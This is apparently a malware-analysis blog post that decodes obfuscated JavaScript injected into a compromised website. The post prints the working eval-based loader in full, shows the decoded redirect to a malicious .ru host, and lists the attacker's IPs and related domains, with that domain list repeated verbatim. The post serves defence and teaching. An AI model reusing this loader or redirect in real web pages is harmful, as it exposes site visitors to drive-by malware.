In this case, the code inserted into the compromised site is as follows (I've formatted it for readability):
v="v"+"a"+"l";  // "val"; joined with "e" in the window lookup below to spell "eval" without that literal ever appearing
// Two nested try/catch blocks. faweb and sbgesrb are never defined in this listing, so each
// statement throws a ReferenceError and execution falls through to the innermost catch.
try
{
faweb++
}
catch(btawetb)
{
try
{
sbgesrb+325
}
catch(btawt4)
{
w=window;
e=w["e"+v];  // window["eval"], fetched through a computed property name
}
}
if(1)  // always true
{
f=new Array(118,96,112,49,60,50,57,58,8,118,96,112,50,60,116,97,113,47,59,9,103,102,39,116,97,113,47,61,60,116,97,113,48,41,31,121,100,110,97,117,108,99,110,115,44,108,110,97,97,115,103,111,109,59,34,103,114,116,111,56,47,46,109,110,107,103,110,100,96,97,120,115,110,96,114,111,113,44,114,116,56,56,47,54,48,46,100,111,113,115,109,46,106,105,109,105,115,46,97,111,107,115,109,109,44,112,103,110,34,58,123);  // 111 char codes, each stored as (real code - index % 3); see the loop below
}
w=f;
s=[];  // empty array; the `+` in the loop coerces it to "" so s ends up a string
r=String;
x="j%";  // x+3 is the source text "j%3", evaluated once per iteration
for(i=0;-i+111!=0;i+=1)  // i from 0 while i != 111, i.e. i < 111, matching the array length
{
j=i;
// 031 is octal for 25 == 0x19, so the guard reduces to "e is set". e(x+3) is eval("j%3"),
// which cycles 0,1,2,...; each output character is w[j] + (j % 3).
if(e&&(031==0x19))s=s+r.fromCharCode((1*w[j]+e(x+3)));
}
// 0x10 == 020 (octal 16) is always true. gbrgbdf is undefined, so the ReferenceError lands
// in the catch, which evaluates "if(1)" + the decoded string, i.e. runs the decoded payload
// (the document.location redirect shown further down the page).
if(0x10==020)try
{
gbrgbdf&236;
}
catch(asga)
{
e("if(1)"+s+"");}
// The same sequence is repeated verbatim below, exactly as it appears on the page.
try
{
faweb++
}
catch(btawetb)
{
try
{
sbgesrb+325
}
catch(btawt4)
{
w=window;
e=w["e"+v];
}
}
if(1)
{
f=new Array(118,96,112,49,60,50,57,58,8,118,96,112,50,60,116,97,113,47,59,9,103,102,39,116,97,113,47,61,60,116,97,113,48,41,31,121,100,110,97,117,108,99,110,115,44,108,110,97,97,115,103,111,109,59,34,103,114,116,111,56,47,46,109,110,107,103,110,100,96,97,120,115,110,96,114,111,113,44,114,116,56,56,47,54,48,46,100,111,113,115,109,46,106,105,109,105,115,46,97,111,107,115,109,109,44,112,103,110,34,58,123);
}
w=f;
s=[];
r=String;
x="j%";
for(i=0;-i+111!=0;i+=1)
{
j=i;
if(e&&(031==0x19))s=s+r.fromCharCode((1*w[j]+e(x+3)));
}
if(0x10==020)try
{
gbrgbdf&236;
}
catch(asga)
{
e("if(1)"+s+"");}
To decode this, all you need to do is modify it as follows (run the modified script in an isolated analysis tool such as Malzilla, listed under References, rather than in a browser, since evaluating the decoded string would execute the redirect it contains):
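// Decoder for the char-code array from the sample above.
//
// The sample reaches eval through window["e"+"val"] and uses it twice: once per
// character to compute eval("j%3"), and once at the end to run the decoded text.
// Neither is needed to decode. eval("j%3") is simply j % 3, and the decoded string
// is printed rather than evaluated, so running this never triggers the redirect
// it decodes. The loop bound is taken from the array length instead of the
// hard-coded 111, so the same decoder works for other arrays of this form.
//
// Input:  codes - array of numeric char codes (the `f` array of the sample); each
//         entry was stored as (real char code - index % 3).
// Output: the decoded source text as a string ("" for an empty array).
function decodeCharArray(codes)
{
var out="";
for(var j=0;j<codes.length;j+=1)
{
// Number() keeps the arithmetic numeric even if an entry arrived as a string.
out+=String.fromCharCode(Number(codes[j])+(j%3));
}
return out;
}
var f=new Array(118,96,112,49,60,50,57,58,8,118,96,112,50,60,116,97,113,47,59,9,103,102,39,116,97,113,47,61,60,116,97,113,48,41,31,121,100,110,97,117,108,99,110,115,44,108,110,97,97,115,103,111,109,59,34,103,114,116,111,56,47,46,109,110,107,103,110,100,96,97,120,115,110,96,114,111,113,44,114,116,56,56,47,54,48,46,100,111,113,115,109,46,106,105,109,105,115,46,97,111,107,115,109,109,44,112,103,110,34,58,123);
var s=decodeCharArray(f);
console.log(s);  // display the decoded text instead of evaluating it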
Which gives us the following (I've disabled the URL so that it isn't auto-hyperlinked by readers' clients):
// Decoded payload. var2 is assigned from var1, so var1==var2 is always true and the
// document.location redirect is unconditional. "hxxp" is the disabled form of "http".
var1=49;
var2=var1;
if(var1==var2) {document.location="hxxp://onlinebayunator.ru:8080/forum/links/column.php";}
// The last two lines are repeated verbatim on the page.
var2=var1;
if(var1==var2) {document.location="hxxp://onlinebayunator.ru:8080/forum/links/column.php";}
In this case, onlinebayunator.ru is residing at:
70.38.31.71 - AS32613 70.38.0.0/17 IWEB-AS - iWeb Technologies Inc.
202.3.245.13 - AS9471 202.3.245.0/24 MANA-PF-AP MANA S.A.
203.80.16.81 - ns1.myren.net.my - AS24514 203.80.16.0/21 MYREN-MY Malaysian Research & Education Network
Other domains known to have lived (most, thankfully, are now dead) or to be living on these IPs include:
adventiste.pf
anapoli.ru
ashanrestaurant.ru
atp.presidence.pf
bmwforummsk.ru
croixrouge.presidence.pf
denegnashete.ru
diareuomop.ru
dimabilanch.ru
etatsgeneraux.pf
flumifrator2unix.ru
forumanarhist.ru
furnitura-forums.ru
gorysevera.ru
ioponeslal.ru
ipadvssonyx.ru
kefrikin.ru
kerneloffce.ru
kolmykiaonline.ru
leprisoruim.ru
limonadiksec.ru
mazdaontours.ru
minweb.presidence.pf
mirdymas.ru
moskow-carsharing.ru
moskowpulkavo.ru
mskoblastionline.ru
myren.net.my
mysqlfordummys.ru
offshoremskk.ru
omahabeachs.ru
onerussiaboard.ru
onlinebayunator.ru
online-cammunity.ru
online-gaminatore.ru
panalki.ru
panamamoskow.ru
penelopochka.ru
phpforkiddies.ru
porschedesignrussia.ru
porscheforumspb.ru
presid.pf
presidence.gov.pf
presidence.pf
psg.presidence.pf
pussyriotss.ru
refonte.presidence.pf
rumyniaonline.ru
sectantes-x.ru
sergikgorec.ru
soisokdomen.ru
sonatanamore.ru
spb-koalitia.ru
switched-games.ru
uzoshkins.ru
zenedin-zidane.ru
anapoli.ru
ashanrestaurant.ru
atp.presidence.pf
bmwforummsk.ru
croixrouge.presidence.pf
denegnashete.ru
diareuomop.ru
dimabilanch.ru
etatsgeneraux.pf
flumifrator2unix.ru
forumanarhist.ru
furnitura-forums.ru
gorysevera.ru
ioponeslal.ru
ipadvssonyx.ru
kefrikin.ru
kerneloffce.ru
kolmykiaonline.ru
leprisoruim.ru
limonadiksec.ru
mazdaontours.ru
minweb.presidence.pf
mirdymas.ru
moskow-carsharing.ru
moskowpulkavo.ru
mskoblastionline.ru
myren.net.my
mysqlfordummys.ru
offshoremskk.ru
omahabeachs.ru
onerussiaboard.ru
onlinebayunator.ru
online-cammunity.ru
online-gaminatore.ru
panalki.ru
panamamoskow.ru
penelopochka.ru
phpforkiddies.ru
porschedesignrussia.ru
porscheforumspb.ru
presid.pf
presidence.gov.pf
presidence.pf
psg.presidence.pf
pussyriotss.ru
refonte.presidence.pf
rumyniaonline.ru
sectantes-x.ru
sergikgorec.ru
soisokdomen.ru
sonatanamore.ru
spb-koalitia.ru
switched-games.ru
uzoshkins.ru
zenedin-zidane.ru
hpHosts, Malware Domain List and Malwarebytes Anti-Malware users will be pleased to know that the IPs/domains are already blocked.
Incidentally, onlinebayunator.ru was resolving to the following yesterday (1st October), and nope, I'm not surprised to see CB3ROB's IP space making an appearance either:
84.22.100.108 - mail.cyberbunker.com - AS34109 84.22.96.0/19 AS34109 CB3ROB Ltd. & Co. KG
190.10.14.196 - cb9.creationsbank.com - AS3790 190.10.0.0/17 RADIOGRAFICA COSTARRICENSE
203.80.16.81 - ns1.myren.net.my - AS24514 203.80.16.0/21 MYREN-MY Malaysian Research & Education Network
References
Malware Domain List - Malzilla
http://www.malwaredomainlist.com/forums/index.php?topic=218.0
Malzilla (open source)
http://malzilla.sourceforge.net
How could my site be infected by this exploit?